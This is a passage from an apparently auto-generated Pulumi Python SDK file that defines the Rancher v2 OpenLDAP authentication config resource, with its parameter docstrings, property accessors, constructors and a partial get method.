group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
type: Optional[pulumi.Input[str]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering AuthConfigOpenLdap resources.
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[str] name: (Computed) The name of the resource (string)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[str] type: (Computed) The type of the resource (string)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
"""
if access_mode is not None:
pulumi.set(__self__, "access_mode", access_mode)
if allowed_principal_ids is not None:
pulumi.set(__self__, "allowed_principal_ids", allowed_principal_ids)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if certificate is not None:
pulumi.set(__self__, "certificate", certificate)
if connection_timeout is not None:
pulumi.set(__self__, "connection_timeout", connection_timeout)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if group_dn_attribute is not None:
pulumi.set(__self__, "group_dn_attribute", group_dn_attribute)
if group_member_mapping_attribute is not None:
pulumi.set(__self__, "group_member_mapping_attribute", group_member_mapping_attribute)
if group_member_user_attribute is not None:
pulumi.set(__self__, "group_member_user_attribute", group_member_user_attribute)
if group_name_attribute is not None:
pulumi.set(__self__, "group_name_attribute", group_name_attribute)
if group_object_class is not None:
pulumi.set(__self__, "group_object_class", group_object_class)
if group_search_attribute is not None:
pulumi.set(__self__, "group_search_attribute", group_search_attribute)
if group_search_base is not None:
pulumi.set(__self__, "group_search_base", group_search_base)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if nested_group_membership_enabled is not None:
pulumi.set(__self__, "nested_group_membership_enabled", nested_group_membership_enabled)
if port is not None:
pulumi.set(__self__, "port", port)
if servers is not None:
pulumi.set(__self__, "servers", servers)
if service_account_distinguished_name is not None:
pulumi.set(__self__, "service_account_distinguished_name", service_account_distinguished_name)
if service_account_password is not None:
pulumi.set(__self__, "service_account_password", service_account_password)
if test_password is not None:
pulumi.set(__self__, "test_password", test_password)
if test_username is not None:
pulumi.set(__self__, "test_username", test_username)
if tls is not None:
pulumi.set(__self__, "tls", tls)
if type is not None:
pulumi.set(__self__, "type", type)
if user_disabled_bit_mask is not None:
pulumi.set(__self__, "user_disabled_bit_mask", user_disabled_bit_mask)
if user_enabled_attribute is not None:
pulumi.set(__self__, "user_enabled_attribute", user_enabled_attribute)
if user_login_attribute is not None:
pulumi.set(__self__, "user_login_attribute", user_login_attribute)
if user_member_attribute is not None:
pulumi.set(__self__, "user_member_attribute", user_member_attribute)
if user_name_attribute is not None:
pulumi.set(__self__, "user_name_attribute", user_name_attribute)
if user_object_class is not None:
pulumi.set(__self__, "user_object_class", user_object_class)
if user_search_attribute is not None:
pulumi.set(__self__, "user_search_attribute", user_search_attribute)
if user_search_base is not None:
pulumi.set(__self__, "user_search_base", user_search_base)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> Optional[pulumi.Input[str]]:
"""
Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
"""
return pulumi.get(self, "access_mode")
@access_mode.setter
def access_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_mode", value)
@property
@pulumi.getter(name="allowedPrincipalIds")
def allowed_principal_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
"""
return pulumi.get(self, "allowed_principal_ids")
@allowed_principal_ids.setter
def allowed_principal_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_principal_ids", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Annotations of the resource (map)
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def certificate(self) -> Optional[pulumi.Input[str]]:
"""
Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
"""
return pulumi.get(self, "certificate")
@certificate.setter
def certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate", value)
@property
@pulumi.getter(name="connectionTimeout")
def connection_timeout(self) -> Optional[pulumi.Input[int]]:
"""
OpenLdap connection timeout. Default `5000` (int)
"""
return pulumi.get(self, "connection_timeout")
@connection_timeout.setter
def connection_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_timeout", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable auth config provider. Default `true` (bool)
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="groupDnAttribute")
def group_dn_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group DN attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_dn_attribute")
@group_dn_attribute.setter
def group_dn_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_dn_attribute", value)
@property
@pulumi.getter(name="groupMemberMappingAttribute")
def group_member_mapping_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group member mapping attribute. Default `member` (string)
"""
return pulumi.get(self, "group_member_mapping_attribute")
@group_member_mapping_attribute.setter
def group_member_mapping_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_member_mapping_attribute", value)
@property
@pulumi.getter(name="groupMemberUserAttribute")
def group_member_user_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group member user attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_member_user_attribute")
@group_member_user_attribute.setter
def group_member_user_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_member_user_attribute", value)
@property
@pulumi.getter(name="groupNameAttribute")
def group_name_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group name attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_name_attribute")
@group_name_attribute.setter
def group_name_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_name_attribute", value)
@property
@pulumi.getter(name="groupObjectClass")
def group_object_class(self) -> Optional[pulumi.Input[str]]:
"""
Group object class. Default `groupOfNames` (string)
"""
return pulumi.get(self, "group_object_class")
@group_object_class.setter
def group_object_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_object_class", value)
@property
@pulumi.getter(name="groupSearchAttribute")
def group_search_attribute(self) -> Optional[pulumi.Input[str]]:
"""
Group search attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_search_attribute")
@group_search_attribute.setter
def group_search_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_search_attribute", value)
@property
@pulumi.getter(name="groupSearchBase")
def group_search_base(self) -> Optional[pulumi.Input[str]]:
"""
Group search base (string)
"""
return pulumi.get(self, "group_search_base")
@group_search_base.setter
def group_search_base(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_search_base", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Labels of the resource (map)
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The name of the resource (string)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nestedGroupMembershipEnabled")
def nested_group_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Nested group membership enable. Default `false` (bool)
"""
return pulumi.get(self, "nested_group_membership_enabled")
@nested_group_membership_enabled.setter
def nested_group_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "nested_group_membership_enabled", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
OpenLdap port. Default `389` (int)
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
OpenLdap servers list (list)
"""
return pulumi.get(self, "servers")
@servers.setter
def servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "servers", value)
@property
@pulumi.getter(name="serviceAccountDistinguishedName")
def service_account_distinguished_name(self) -> Optional[pulumi.Input[str]]:
"""
Service account DN for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_distinguished_name")
@service_account_distinguished_name.setter
def service_account_distinguished_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_account_distinguished_name", value)
@property
@pulumi.getter(name="serviceAccountPassword")
def service_account_password(self) -> Optional[pulumi.Input[str]]:
"""
Service account password for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_password")
@service_account_password.setter
def service_account_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_account_password", value)
@property
@pulumi.getter(name="testPassword")
def test_password(self) -> Optional[pulumi.Input[str]]:
"""
Password for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_password")
@test_password.setter
def test_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "test_password", value)
@property
@pulumi.getter(name="testUsername")
def test_username(self) -> Optional[pulumi.Input[str]]:
"""
Username for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_username")
@test_username.setter
def test_username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "test_username", value)
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input[bool]]:
"""
Enable TLS connection (bool)
"""
return pulumi.get(self, "tls")
@tls.setter
def tls(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "tls", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The type of the resource (string)
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userDisabledBitMask")
def user_disabled_bit_mask(self) -> Optional[pulumi.Input[int]]:
"""
User disabled bit mask (int)
"""
return pulumi.get(self, "user_disabled_bit_mask")
@user_disabled_bit_mask.setter
def user_disabled_bit_mask(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_disabled_bit_mask", value)
@property
@pulumi.getter(name="userEnabledAttribute")
def user_enabled_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User enable attribute (string)
"""
return pulumi.get(self, "user_enabled_attribute")
@user_enabled_attribute.setter
def user_enabled_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_enabled_attribute", value)
@property
@pulumi.getter(name="userLoginAttribute")
def user_login_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User login attribute. Default `uid` (string)
"""
return pulumi.get(self, "user_login_attribute")
@user_login_attribute.setter
def user_login_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_login_attribute", value)
@property
@pulumi.getter(name="userMemberAttribute")
def user_member_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User member attribute. Default `memberOf` (string)
"""
return pulumi.get(self, "user_member_attribute")
@user_member_attribute.setter
def user_member_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_member_attribute", value)
@property
@pulumi.getter(name="userNameAttribute")
def user_name_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User name attribute. Default `givenName` (string)
"""
return pulumi.get(self, "user_name_attribute")
@user_name_attribute.setter
def user_name_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name_attribute", value)
@property
@pulumi.getter(name="userObjectClass")
def user_object_class(self) -> Optional[pulumi.Input[str]]:
"""
User object class. Default `inetorgperson` (string)
"""
return pulumi.get(self, "user_object_class")
@user_object_class.setter
def user_object_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_object_class", value)
@property
@pulumi.getter(name="userSearchAttribute")
def user_search_attribute(self) -> Optional[pulumi.Input[str]]:
"""
User search attribute. Default `uid|sn|givenName` (string)
"""
return pulumi.get(self, "user_search_attribute")
@user_search_attribute.setter
def user_search_attribute(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_search_attribute", value)
@property
@pulumi.getter(name="userSearchBase")
def user_search_base(self) -> Optional[pulumi.Input[str]]:
"""
User search base DN (string)
"""
return pulumi.get(self, "user_search_base")
@user_search_base.setter
def user_search_base(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_search_base", value)
class AuthConfigOpenLdap(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Rancher v2 Auth Config OpenLdap resource. This can be used to configure and enable Auth Config OpenLdap for Rancher v2 RKE clusters and retrieve their information.
In addition to the built-in local auth, only one external auth config provider can be enabled at a time.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AuthConfigOpenLdapArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Rancher v2 Auth Config OpenLdap resource. This can be used to configure and enable Auth Config OpenLdap for Rancher v2 RKE clusters and retrieve their information.
In addition to the built-in local auth, only one external auth config provider can be enabled at a time.
:param str resource_name: The name of the resource.
:param AuthConfigOpenLdapArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AuthConfigOpenLdapArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AuthConfigOpenLdapArgs.__new__(AuthConfigOpenLdapArgs)
__props__.__dict__["access_mode"] = access_mode
__props__.__dict__["allowed_principal_ids"] = allowed_principal_ids
__props__.__dict__["annotations"] = annotations
__props__.__dict__["certificate"] = certificate
__props__.__dict__["connection_timeout"] = connection_timeout
__props__.__dict__["enabled"] = enabled
__props__.__dict__["group_dn_attribute"] = group_dn_attribute
__props__.__dict__["group_member_mapping_attribute"] = group_member_mapping_attribute
__props__.__dict__["group_member_user_attribute"] = group_member_user_attribute
__props__.__dict__["group_name_attribute"] = group_name_attribute
__props__.__dict__["group_object_class"] = group_object_class
__props__.__dict__["group_search_attribute"] = group_search_attribute
__props__.__dict__["group_search_base"] = group_search_base
__props__.__dict__["labels"] = labels
__props__.__dict__["nested_group_membership_enabled"] = nested_group_membership_enabled
__props__.__dict__["port"] = port
if servers is None and not opts.urn:
raise TypeError("Missing required property 'servers'")
__props__.__dict__["servers"] = servers
if service_account_distinguished_name is None and not opts.urn:
raise TypeError("Missing required property 'service_account_distinguished_name'")
__props__.__dict__["service_account_distinguished_name"] = service_account_distinguished_name
if service_account_password is None and not opts.urn:
raise TypeError("Missing required property 'service_account_password'")
__props__.__dict__["service_account_password"] = service_account_password
if test_password is None and not opts.urn:
raise TypeError("Missing required property 'test_password'")
__props__.__dict__["test_password"] = test_password
if test_username is None and not opts.urn:
raise TypeError("Missing required property 'test_username'")
__props__.__dict__["test_username"] = test_username
__props__.__dict__["tls"] = tls
__props__.__dict__["user_disabled_bit_mask"] = user_disabled_bit_mask
__props__.__dict__["user_enabled_attribute"] = user_enabled_attribute
__props__.__dict__["user_login_attribute"] = user_login_attribute
__props__.__dict__["user_member_attribute"] = user_member_attribute
__props__.__dict__["user_name_attribute"] = user_name_attribute
__props__.__dict__["user_object_class"] = user_object_class
__props__.__dict__["user_search_attribute"] = user_search_attribute
if user_search_base is None and not opts.urn:
raise TypeError("Missing required property 'user_search_base'")
__props__.__dict__["user_search_base"] = user_search_base
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
super(AuthConfigOpenLdap, __self__).__init__(
'rancher2:index/authConfigOpenLdap:AuthConfigOpenLdap',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
group_member_user_attribute: Optional[pulumi.Input[str]] = None,
group_name_attribute: Optional[pulumi.Input[str]] = None,
group_object_class: Optional[pulumi.Input[str]] = None,
group_search_attribute: Optional[pulumi.Input[str]] = None,
group_search_base: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
port: Optional[pulumi.Input[int]] = None,
servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
service_account_password: Optional[pulumi.Input[str]] = None,
test_password: Optional[pulumi.Input[str]] = None,
test_username: Optional[pulumi.Input[str]] = None,
tls: Optional[pulumi.Input[bool]] = None,
type: Optional[pulumi.Input[str]] = None,
user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
user_enabled_attribute: Optional[pulumi.Input[str]] = None,
user_login_attribute: Optional[pulumi.Input[str]] = None,
user_member_attribute: Optional[pulumi.Input[str]] = None,
user_name_attribute: Optional[pulumi.Input[str]] = None,
user_object_class: Optional[pulumi.Input[str]] = None,
user_search_attribute: Optional[pulumi.Input[str]] = None,
user_search_base: Optional[pulumi.Input[str]] = None) -> 'AuthConfigOpenLdap':
"""
Get an existing AuthConfigOpenLdap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
:param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
:param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
:param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
:param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
:param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
:param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
:param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
:param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
:param pulumi.Input[str] group_search_base: Group search base (string)
:param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
:param pulumi.Input[str] name: (Computed) The name of the resource (string)
:param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
:param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
:param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
:param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
:param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
:param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
:param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
:param pulumi.Input[bool] tls: Enable TLS connection (bool)
:param pulumi.Input[str] type: (Computed) The type of the resource (string)
:param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
:param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
:param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
